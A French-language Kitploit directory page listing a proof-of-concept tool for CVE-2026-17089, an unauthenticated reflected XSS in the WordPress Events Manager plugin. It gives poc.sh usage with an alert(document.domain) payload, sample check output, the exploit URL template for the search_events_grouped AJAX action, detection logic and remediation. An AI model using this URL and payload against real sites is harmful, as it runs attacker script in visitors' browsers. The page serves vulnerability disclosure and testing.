Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-17089-PoC-pwnVader — PoC shell pour CVE-2026-17089, une XSS réfléchie non authentifiée dans le plugin WordPress Events Manager (<= 7.4.0.1) ; identifie le plugin et teste la réflexion de header_format. | Kitploit
Outils/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Scanners de VulnérabilitésScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

PoC shell pour CVE-2026-17089, une XSS réfléchie non authentifiée dans le plugin WordPress Events Manager (<= 7.4.0.1) ; identifie le plugin et teste la réflexion de header_format.

Voir le dépôt
il y a 10 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-17089 — Events Manager <= 7.4.0.1 — XSS réfléchie non authentifiée (header_format)

Auteur : pwnVader · Licence : MIT (racine du dépôt)

ComposantEvents Manager – Calendar, Bookings, Tickets, and more! (extension WordPress)
TypeCWE-79 — Cross-Site Scripting réfléchie
Affecté<= 7.4.0.1
Corrigéversion ultérieure 7.4.x (wp_kses_post() appliqué dans EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Résumé

Le point d'entrée du shortcode assainit header_format avec wp_kses(), mais l'action AJAX non authentifiée search_events_grouped contourne cet assainissement et renvoie la valeur dans la réponse HTML (EM_Events::output_grouped()). Un attaquant distant et non authentifié peut concevoir une URL qui exécute du JavaScript arbitraire dans l'origine du site affecté pour tout utilisateur qui l'ouvre (UI:R).

Utilisation

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Exemple de sortie (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

URL d'exploitation

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Logique de détection

  1. Empreinte : readme.txt (Stable tag) et/ou le chemin d'asset de l'extension /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Envoyer un marqueur bénin (``) à admin-ajax.php?action=search_events_grouped avec header_format défini sur le marqueur et vérifier si le balisage brut est reflété sans échappement dans le corps de la réponse.

Remédiation

  • Mettre à jour Events Manager vers la version actuelle (le correctif applique wp_kses_post() à header_format dans la fonction de rendu, couvrant tous les appelants).
  • En attendant : bloquer l'action AJAX non authentifiée search_events_grouped ou filtrer header_format au niveau du WAF/de l'application.

Références

  • NVD — CVE-2026-17089 : https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory : https://github.com/advisories/GHSA-gg76-jx66-hjq8

Avertissement

Pour des tests de sécurité autorisés uniquement. Le PoC est en lecture seule (check) ou affiche une URL (url) ; aucune donnée n'est modifiée.

Télécharger l’outil